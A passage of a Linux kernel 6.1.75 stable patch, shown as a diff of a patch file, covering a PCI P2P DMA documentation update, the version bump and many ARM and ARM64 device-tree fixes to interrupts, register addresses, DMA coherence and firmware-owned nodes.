+diff --git a/Documentation/driver-api/pci/p2pdma.rst b/Documentation/driver-api/pci/p2pdma.rst
+index 44deb52beeb47..d0b241628cf13 100644
+--- a/Documentation/driver-api/pci/p2pdma.rst
++++ b/Documentation/driver-api/pci/p2pdma.rst
+@@ -83,19 +83,9 @@ this to include other types of resources like doorbells.
+ Client Drivers
+ --------------
+ 
+-A client driver typically only has to conditionally change its DMA map
+-routine to use the mapping function :c:func:`pci_p2pdma_map_sg()` instead
+-of the usual :c:func:`dma_map_sg()` function. Memory mapped in this
+-way does not need to be unmapped.
+-
+-The client may also, optionally, make use of
+-:c:func:`is_pci_p2pdma_page()` to determine when to use the P2P mapping
+-functions and when to use the regular mapping functions. In some
+-situations, it may be more appropriate to use a flag to indicate a
+-given request is P2P memory and map appropriately. It is important to
+-ensure that struct pages that back P2P memory stay out of code that
+-does not have support for them as other code may treat the pages as
+-regular memory which may not be appropriate.
++A client driver only has to use the mapping API :c:func:`dma_map_sg()`
++and :c:func:`dma_unmap_sg()` functions as usual, and the implementation
++will do the right thing for the P2P capable memory.
+ 
+ 
+ Orchestrator Drivers
+diff --git a/Makefile b/Makefile
+index 63125d1ffd9cf..7cd49d9eadbfc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 74
++SUBLEVEL = 75
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index 4b57e9f5bc648..2b3927a829b70 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -750,7 +750,7 @@
+ 
+ 				xoadc: xoadc@197 {
+ 					compatible = "qcom,pm8921-adc";
+-					reg = <197>;
++					reg = <0x197>;
+ 					interrupts-extended = <&pmicintc 78 IRQ_TYPE_EDGE_RISING>;
+ 					#address-cells = <2>;
+ 					#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/qcom-sdx65.dtsi b/arch/arm/boot/dts/qcom-sdx65.dtsi
+index ecb9171e4da5f..ebb78b489e638 100644
+--- a/arch/arm/boot/dts/qcom-sdx65.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx65.dtsi
+@@ -401,7 +401,7 @@
+ 			reg = <0x0c264000 0x1000>;
+ 		};
+ 
+-		spmi_bus: qcom,spmi@c440000 {
++		spmi_bus: spmi@c440000 {
+ 			compatible = "qcom,spmi-pmic-arb";
+ 			reg = <0xc440000 0xd00>,
+ 				<0xc600000 0x2000000>,
+diff --git a/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts b/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts
+index e539cc80bef81..942a6ca38d97e 100644
+--- a/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts
+@@ -11,7 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157A-DK1 SCMI Discovery Board";
+-	compatible = "st,stm32mp157a-dk1-scmi", "st,stm32mp157a-dk1", "st,stm32mp157";
++	compatible = "st,stm32mp157a-dk1-scmi", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@de000000 {
+diff --git a/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts b/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts
+index 97e4f94b0a24e..99c4ff1f5c214 100644
+--- a/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts
+@@ -11,7 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157C-DK2 SCMI Discovery Board";
+-	compatible = "st,stm32mp157c-dk2-scmi", "st,stm32mp157c-dk2", "st,stm32mp157";
++	compatible = "st,stm32mp157c-dk2-scmi", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@de000000 {
+diff --git a/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts b/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts
+index 9cf0a44d2f47e..21010458b36f5 100644
+--- a/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts
+@@ -11,7 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157C-ED1 SCMI eval daughter";
+-	compatible = "st,stm32mp157c-ed1-scmi", "st,stm32mp157c-ed1", "st,stm32mp157";
++	compatible = "st,stm32mp157c-ed1-scmi", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@fe000000 {
+diff --git a/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts b/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts
+index 3b9dd6f4ccc96..d376371499193 100644
+--- a/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts
+@@ -11,8 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157C-EV1 SCMI eval daughter on eval mother";
+-	compatible = "st,stm32mp157c-ev1-scmi", "st,stm32mp157c-ev1", "st,stm32mp157c-ed1",
+-		     "st,stm32mp157";
++	compatible = "st,stm32mp157c-ev1-scmi", "st,stm32mp157c-ed1", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@fe000000 {
+diff --git a/arch/arm/mach-davinci/Kconfig b/arch/arm/mach-davinci/Kconfig
+index c8cbd9a307914..672ffb0b5f3af 100644
+--- a/arch/arm/mach-davinci/Kconfig
++++ b/arch/arm/mach-davinci/Kconfig
+@@ -4,12 +4,14 @@ menuconfig ARCH_DAVINCI
+ 	bool "TI DaVinci"
+ 	depends on ARCH_MULTI_V5
+ 	depends on CPU_LITTLE_ENDIAN
++	select CPU_ARM926T
+ 	select DAVINCI_TIMER
+ 	select ZONE_DMA
+ 	select PM_GENERIC_DOMAINS if PM
+ 	select PM_GENERIC_DOMAINS_OF if PM && OF
+ 	select REGMAP_MMIO
+ 	select RESET_CONTROLLER
++	select PINCTRL
+ 	select PINCTRL_SINGLE
+ 
+ if ARCH_DAVINCI
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index d583db18f74cc..7a410d73600b1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -1303,7 +1303,7 @@
+ 			assigned-clocks = <&clk IMX8MM_CLK_GPU3D_CORE>,
+ 					  <&clk IMX8MM_GPU_PLL_OUT>;
+ 			assigned-clock-parents = <&clk IMX8MM_GPU_PLL_OUT>;
+-			assigned-clock-rates = <0>, <1000000000>;
++			assigned-clock-rates = <0>, <800000000>;
+ 			power-domains = <&pgc_gpu>;
+ 		};
+ 
+@@ -1318,7 +1318,7 @@
+ 			assigned-clocks = <&clk IMX8MM_CLK_GPU2D_CORE>,
+ 					  <&clk IMX8MM_GPU_PLL_OUT>;
+ 			assigned-clock-parents = <&clk IMX8MM_GPU_PLL_OUT>;
+-			assigned-clock-rates = <0>, <1000000000>;
++			assigned-clock-rates = <0>, <800000000>;
+ 			power-domains = <&pgc_gpu>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi b/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi
+index 970047f2dabd5..c06e011a6c3ff 100644
+--- a/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi
++++ b/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi
+@@ -25,9 +25,6 @@
+ 			gpios = <&gpio28 0 0>;
+ 
+ 			regulators {
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+-
+ 				ldo3: ldo3 { /* HDMI */
+ 					regulator-name = "ldo3";
+ 					regulator-min-microvolt = <1500000>;
+diff --git a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+index 200f97e1c4c9c..37350e5fa253a 100644
+--- a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
++++ b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+@@ -130,7 +130,7 @@
+ 		compatible = "microchip,mcp7940x";
+ 		reg = <0x6f>;
+ 		interrupt-parent = <&gpiosb>;
+-		interrupts = <5 0>; /* GPIO2_5 */
++		interrupts = <5 IRQ_TYPE_EDGE_FALLING>; /* GPIO2_5 */
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 10779a9947fe2..d5d9b954c449a 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1586,7 +1586,7 @@
+ 			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0 0x1000>;
+ 		};
+ 
+-		mdp3-rdma0@14001000 {
++		dma-controller0@14001000 {
+ 			compatible = "mediatek,mt8183-mdp3-rdma";
+ 			reg = <0 0x14001000 0 0x1000>;
+ 			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
+@@ -1598,6 +1598,7 @@
+ 			iommus = <&iommu M4U_PORT_MDP_RDMA0>;
+ 			mboxes = <&gce 20 CMDQ_THR_PRIO_LOWEST 0>,
+ 				 <&gce 21 CMDQ_THR_PRIO_LOWEST 0>;
++			#dma-cells = <1>;
+ 		};
+ 
+ 		mdp3-rsz0@14003000 {
+@@ -1618,7 +1619,7 @@
+ 			clocks = <&mmsys CLK_MM_MDP_RSZ1>;
+ 		};
+ 
+-		mdp3-wrot0@14005000 {
++		dma-controller@14005000 {
+ 			compatible = "mediatek,mt8183-mdp3-wrot";
+ 			reg = <0 0x14005000 0 0x1000>;
+ 			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x5000 0x1000>;
+@@ -1627,6 +1628,7 @@
+ 			power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
+ 			clocks = <&mmsys CLK_MM_MDP_WROT0>;
+ 			iommus = <&iommu M4U_PORT_MDP_WROT0>;
++			#dma-cells = <1>;
+ 		};
+ 
+ 		mdp3-wdma@14006000 {
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index 43ff8f1f1475c..1533c61cb106c 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -146,7 +146,7 @@
+ 		ranges;
+ 
+ 		rpm_msg_ram: memory@60000 {
+-			reg = <0x0 0x60000 0x0 0x6000>;
++			reg = <0x0 0x00060000 0x0 0x6000>;
+ 			no-map;
+ 		};
+ 
+@@ -181,7 +181,7 @@
+ 
+ 		prng: qrng@e1000 {
+ 			compatible = "qcom,prng-ee";
+-			reg = <0x0 0xe3000 0x0 0x1000>;
++			reg = <0x0 0x000e3000 0x0 0x1000>;
+ 			clocks = <&gcc GCC_PRNG_AHB_CLK>;
+ 			clock-names = "core";
+ 		};
+@@ -201,8 +201,8 @@
+ 			compatible = "qcom,crypto-v5.1";
+ 			reg = <0x0 0x0073a000 0x0 0x6000>;
+ 			clocks = <&gcc GCC_CRYPTO_AHB_CLK>,
+-				<&gcc GCC_CRYPTO_AXI_CLK>,
+-				<&gcc GCC_CRYPTO_CLK>;
++				 <&gcc GCC_CRYPTO_AXI_CLK>,
++				 <&gcc GCC_CRYPTO_CLK>;
+ 			clock-names = "iface", "bus", "core";
+ 			dmas = <&cryptobam 2>, <&cryptobam 3>;
+ 			dma-names = "rx", "tx";
+@@ -272,7 +272,7 @@
+ 			reg = <0x0 0x078b1000 0x0 0x200>;
+ 			interrupts = <GIC_SPI 306 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&gcc GCC_BLSP1_UART3_APPS_CLK>,
+-				<&gcc GCC_BLSP1_AHB_CLK>;
++				 <&gcc GCC_BLSP1_AHB_CLK>;
+ 			clock-names = "core", "iface";
+ 			status = "disabled";
+ 		};
+@@ -285,7 +285,7 @@
+ 			interrupts = <GIC_SPI 95 IRQ_TYPE_LEVEL_HIGH>;
+ 			spi-max-frequency = <50000000>;
+ 			clocks = <&gcc GCC_BLSP1_QUP1_SPI_APPS_CLK>,
+-				<&gcc GCC_BLSP1_AHB_CLK>;
++				 <&gcc GCC_BLSP1_AHB_CLK>;
+ 			clock-names = "core", "iface";
+ 			dmas = <&blsp_dma 12>, <&blsp_dma 13>;
+ 			dma-names = "tx", "rx";
+@@ -300,7 +300,7 @@
+ 			interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
+ 			spi-max-frequency = <50000000>;
+ 			clocks = <&gcc GCC_BLSP1_QUP2_SPI_APPS_CLK>,
+-				<&gcc GCC_BLSP1_AHB_CLK>;
++				 <&gcc GCC_BLSP1_AHB_CLK>;
+ 			clock-names = "core", "iface";
+ 			dmas = <&blsp_dma 14>, <&blsp_dma 15>;
+ 			dma-names = "tx", "rx";
+@@ -358,8 +358,8 @@
+ 			clock-names = "core", "aon";
+ 
+ 			dmas = <&qpic_bam 0>,
+-				<&qpic_bam 1>,
+-				<&qpic_bam 2>;
++			       <&qpic_bam 1>,
++			       <&qpic_bam 2>;
+ 			dma-names = "tx", "rx", "cmd";
+ 			pinctrl-0 = <&qpic_pins>;
+ 			pinctrl-names = "default";
+@@ -372,10 +372,10 @@
+ 			#size-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <0x3>;
+-			reg =   <0x0 0x0b000000 0x0 0x1000>,  /*GICD*/
+-				<0x0 0x0b002000 0x0 0x1000>,  /*GICC*/
+-				<0x0 0x0b001000 0x0 0x1000>,  /*GICH*/
+-				<0x0 0x0b004000 0x0 0x1000>;  /*GICV*/
++			reg = <0x0 0x0b000000 0x0 0x1000>,  /*GICD*/
++			      <0x0 0x0b002000 0x0 0x1000>,  /*GICC*/
++			      <0x0 0x0b001000 0x0 0x1000>,  /*GICH*/
++			      <0x0 0x0b004000 0x0 0x1000>;  /*GICV*/
+ 			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 			ranges = <0 0 0 0xb00a000 0 0xffd>;
+ 
+@@ -388,7 +388,7 @@
+ 
+ 		pcie_phy: phy@84000 {
+ 			compatible = "qcom,ipq6018-qmp-pcie-phy";
+-			reg = <0x0 0x84000 0x0 0x1bc>; /* Serdes PLL */
++			reg = <0x0 0x00084000 0x0 0x1bc>; /* Serdes PLL */
+ 			status = "disabled";
+ 			#address-cells = <2>;
+ 			#size-cells = <2>;
+@@ -404,9 +404,10 @@
+ 				      "common";
+ 
+ 			pcie_phy0: phy@84200 {
+-				reg = <0x0 0x84200 0x0 0x16c>, /* Serdes Tx */
+-				      <0x0 0x84400 0x0 0x200>, /* Serdes Rx */
+-				      <0x0 0x84800 0x0 0x4f4>; /* PCS: Lane0, COM, PCIE */
++				reg = <0x0 0x00084200 0x0 0x16c>, /* Serdes Tx */
++				      <0x0 0x00084400 0x0 0x200>, /* Serdes Rx */
++				      <0x0 0x00084800 0x0 0x1f0>, /* PCS: Lane0, COM, PCIE */
++				      <0x0 0x00084c00 0x0 0xf4>; /* pcs_misc */
+ 				#phy-cells = <0>;
+ 
+ 				clocks = <&gcc GCC_PCIE0_PIPE_CLK>;
+@@ -628,7 +629,7 @@
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+ 			compatible = "qcom,ipq6018-mdio", "qcom,ipq4019-mdio";
+-			reg = <0x0 0x90000 0x0 0x64>;
++			reg = <0x0 0x00090000 0x0 0x64>;
+ 			clocks = <&gcc GCC_MDIO_AHB_CLK>;
+ 			clock-names = "gcc_mdio_ahb_clk";
+ 			status = "disabled";
+@@ -636,7 +637,7 @@
+ 
+ 		qusb_phy_1: qusb@59000 {
+ 			compatible = "qcom,ipq6018-qusb2-phy";
+-			reg = <0x0 0x059000 0x0 0x180>;
++			reg = <0x0 0x00059000 0x0 0x180>;
+ 			#phy-cells = <0>;
+ 
+ 			clocks = <&gcc GCC_USB1_PHY_CFG_AHB_CLK>,
+@@ -668,23 +669,23 @@
+ 			status = "disabled";
+ 
+ 			dwc_1: usb@7000000 {
+-			       compatible = "snps,dwc3";
+-			       reg = <0x0 0x7000000 0x0 0xcd00>;
+-			       interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
+-			       phys = <&qusb_phy_1>;
+-			       phy-names = "usb2-phy";
+-			       tx-fifo-resize;
+-			       snps,is-utmi-l1-suspend;
+-			       snps,hird-threshold = /bits/ 8 <0x0>;
+-			       snps,dis_u2_susphy_quirk;
+-			       snps,dis_u3_susphy_quirk;
+-			       dr_mode = "host";
++				compatible = "snps,dwc3";
++				reg = <0x0 0x07000000 0x0 0xcd00>;
++				interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
++				phys = <&qusb_phy_1>;
++				phy-names = "usb2-phy";
++				tx-fifo-resize;
++				snps,is-utmi-l1-suspend;
++				snps,hird-threshold = /bits/ 8 <0x0>;
++				snps,dis_u2_susphy_quirk;
++				snps,dis_u3_susphy_quirk;
++				dr_mode = "host";
+ 			};
+ 		};
+ 
+ 		ssphy_0: ssphy@78000 {
+ 			compatible = "qcom,ipq6018-qmp-usb3-phy";
+-			reg = <0x0 0x78000 0x0 0x1C4>;
++			reg = <0x0 0x00078000 0x0 0x1c4>;
+ 			#address-cells = <2>;
+ 			#size-cells = <2>;
+ 			ranges;
+@@ -701,7 +702,7 @@
+ 			usb0_ssphy: phy@78200 {
+ 				reg = <0x0 0x00078200 0x0 0x130>, /* Tx */
+ 				      <0x0 0x00078400 0x0 0x200>, /* Rx */
+-				      <0x0 0x00078800 0x0 0x1F8>, /* PCS */
++				      <0x0 0x00078800 0x0 0x1f8>, /* PCS */
+ 				      <0x0 0x00078600 0x0 0x044>; /* PCS misc */
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+@@ -713,7 +714,7 @@
+ 
+ 		qusb_phy_0: qusb@79000 {
+ 			compatible = "qcom,ipq6018-qusb2-phy";
+-			reg = <0x0 0x079000 0x0 0x180>;
++			reg = <0x0 0x00079000 0x0 0x180>;
+ 			#phy-cells = <0>;
+ 
+ 			clocks = <&gcc GCC_USB0_PHY_CFG_AHB_CLK>,
+@@ -726,7 +727,7 @@
+ 
+ 		usb3: usb@8af8800 {
+ 			compatible = "qcom,ipq6018-dwc3", "qcom,dwc3";
+-			reg = <0x0 0x8AF8800 0x0 0x400>;
++			reg = <0x0 0x8af8800 0x0 0x400>;
+ 			#address-cells = <2>;
+ 			#size-cells = <2>;
+ 			ranges;
+@@ -745,14 +746,14 @@
+ 					  <&gcc GCC_USB0_MOCK_UTMI_CLK>;
+ 			assigned-clock-rates = <133330000>,
+ 					       <133330000>,
+-					       <20000000>;
++					       <24000000>;
+ 
+ 			resets = <&gcc GCC_USB0_BCR>;
+ 			status = "disabled";
+ 
+ 			dwc_0: usb@8a00000 {
+ 				compatible = "snps,dwc3";
+-				reg = <0x0 0x8A00000 0x0 0xcd00>;
++				reg = <0x0 0x8a00000 0x0 0xcd00>;
+ 				interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&qusb_phy_0>, <&usb0_ssphy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+diff --git a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+index 9731a7c63d53b..1defbe0404e2e 100644
+--- a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
++++ b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+@@ -63,8 +63,8 @@
+ 			function = LED_FUNCTION_INDICATOR;
+ 			color = <LED_COLOR_ID_GREEN>;
+ 			gpios = <&pm8150_gpios 10 GPIO_ACTIVE_HIGH>;
+-			linux,default-trigger = "panic-indicator";
+ 			default-state = "off";
++			panic-indicator;
+ 		};
+ 
+ 		led-wlan {
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index 6f0ee4e13ef1d..78e537f1d7965 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -3378,7 +3378,7 @@
+ 			compatible = "qcom,apss-wdt-sc7180", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000{
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi b/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi
+index 25f31c81b2b74..efe6ea538ad21 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi
+@@ -56,6 +56,26 @@
+ 	};
+ };
+ 
++&lpass_aon {
++	status = "okay";
++};
++
++&lpass_core {
++	status = "okay";
++};
++
++&lpass_hm {
++	status = "okay";
++};
++
++&lpasscc {
++	status = "okay";
++};
++
++&pdc_reset {
++	status = "okay";
++};
++
+ /* The PMIC PON code isn't compatible w/ how Chrome EC/BIOS handle things. */
+ &pmk8350_pon {
+ 	status = "disabled";
+@@ -93,6 +113,10 @@
+ 	reg = <0x0 0x9c900000 0x0 0x800000>;
+ };
+ 
++&watchdog {
++	status = "okay";
++};
++
+ &wifi {
+ 	status = "okay";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index aea356c63b9a3..7fc8c20450223 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -888,6 +888,7 @@
+ 
+ 			bus-width = <8>;
+ 			supports-cqe;
++			dma-coherent;
+ 
+ 			qcom,dll-config = <0x0007642c>;
+ 			qcom,ddr-config = <0x80040868>;
+@@ -2187,6 +2188,7 @@
+ 			clocks = <&gcc GCC_CFG_NOC_LPASS_CLK>;
+ 			clock-names = "iface";
+ 			#clock-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_rx_macro: codec@3200000 {
+@@ -2339,6 +2341,7 @@
+ 			clock-names = "bi_tcxo", "bi_tcxo_ao", "iface";
+ 			#clock-cells = <1>;
+ 			#power-domain-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_core: clock-controller@3900000 {
+@@ -2349,6 +2352,7 @@
+ 			power-domains = <&lpass_hm LPASS_CORE_CC_LPASS_CORE_HM_GDSC>;
+ 			#clock-cells = <1>;
+ 			#power-domain-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_cpu: audio@3987000 {
+@@ -2419,6 +2423,7 @@
+ 			clock-names = "bi_tcxo";
+ 			#clock-cells = <1>;
+ 			#power-domain-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_ag_noc: interconnect@3c40000 {
+@@ -2529,7 +2534,8 @@
+ 				    "cx_mem",
+ 				    "cx_dbgc";
+ 			interrupts = <GIC_SPI 300 IRQ_TYPE_LEVEL_HIGH>;
+-			iommus = <&adreno_smmu 0 0x401>;
++			iommus = <&adreno_smmu 0 0x400>,
++				 <&adreno_smmu 1 0x400>;
+ 			operating-points-v2 = <&gpu_opp_table>;
+ 			qcom,gmu = <&gmu>;
+ 			interconnects = <&gem_noc MASTER_GFX3D 0 &mc_virt SLAVE_EBI1 0>;
+@@ -2696,6 +2702,7 @@
+ 					"gpu_cc_hub_aon_clk";
+ 
+ 			power-domains = <&gpucc GPU_CC_CX_GDSC>;
++			dma-coherent;
+ 		};
+ 
+ 		remoteproc_mpss: remoteproc@4080000 {
+@@ -3265,6 +3272,7 @@
+ 			operating-points-v2 = <&sdhc2_opp_table>;
+ 
+ 			bus-width = <4>;
++			dma-coherent;
+ 
+ 			qcom,dll-config = <0x0007642c>;
+ 
+@@ -3386,8 +3394,8 @@
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 240 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 12 IRQ_TYPE_EDGE_RISING>,
+-					      <&pdc 13 IRQ_TYPE_EDGE_RISING>;
++					      <&pdc 12 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 13 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq",
+ 					  "dp_hs_phy_irq",
+ 					  "dm_hs_phy_irq";
+@@ -4195,6 +4203,7 @@
+ 			compatible = "qcom,sc7280-pdc-global";
+ 			reg = <0 0x0b5e0000 0 0x20000>;
+ 			#reset-cells = <1>;
++			status = "reserved"; /* Owned by firmware */
+ 		};
+ 
+ 		tsens0: thermal-sensor@c263000 {
+@@ -5186,11 +5195,12 @@
+ 			};
+ 		};
+ 
+-		watchdog@17c10000 {
++		watchdog: watchdog@17c10000 {
+ 			compatible = "qcom,apss-wdt-sc7280", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
++			status = "reserved"; /* Owned by Gunyah hyp */
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 405835ad28bcd..7e3aaf5de3f5c 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1653,7 +1653,7 @@
+ 			compatible = "qcom,apss-wdt-sc8280xp", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index 8c9ccf5b4ea41..135ff4368c4a6 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -66,8 +66,8 @@
+ 			function = LED_FUNCTION_INDICATOR;
+ 			color = <LED_COLOR_ID_GREEN>;
+ 			gpios = <&pm8998_gpio 13 GPIO_ACTIVE_HIGH>;
+-			linux,default-trigger = "panic-indicator";
+ 			default-state = "off";
++			panic-indicator;
+ 		};
+ 
+ 		led-1 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 52c9f5639f8a2..1e6841902900c 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -5019,7 +5019,7 @@
+ 			compatible = "qcom,apss-wdt-sdm845", "qcom,kpss-wdt";
+ 			reg = <0 0x17980000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		apss_shared: mailbox@17990000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index cea7ca3f326fc..9da373090593c 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -1462,7 +1462,7 @@
+ 			compatible = "qcom,apss-wdt-sm6350", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-hdk.dts b/arch/arm64/boot/dts/qcom/sm8150-hdk.dts
+index 3331ee957d648..368da4c7f41be 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-hdk.dts
++++ b/arch/arm64/boot/dts/qcom/sm8150-hdk.dts
+@@ -126,8 +126,6 @@
+ 		vdda_sp_sensor:
+ 		vdda_ufs_2ln_core_1:
+ 		vdda_ufs_2ln_core_2:
+-		vdda_usb_ss_dp_core_1:
+-		vdda_usb_ss_dp_core_2:
+ 		vdda_qlink_lv:
+ 		vdda_qlink_lv_ck:
+ 		vreg_l5a_0p875: ldo5 {
+@@ -209,6 +207,12 @@
+ 			regulator-max-microvolt = <3008000>;
+ 			regulator-initial-mode = <RPMH_REGULATOR_MODE_HPM>;
+ 		};
++
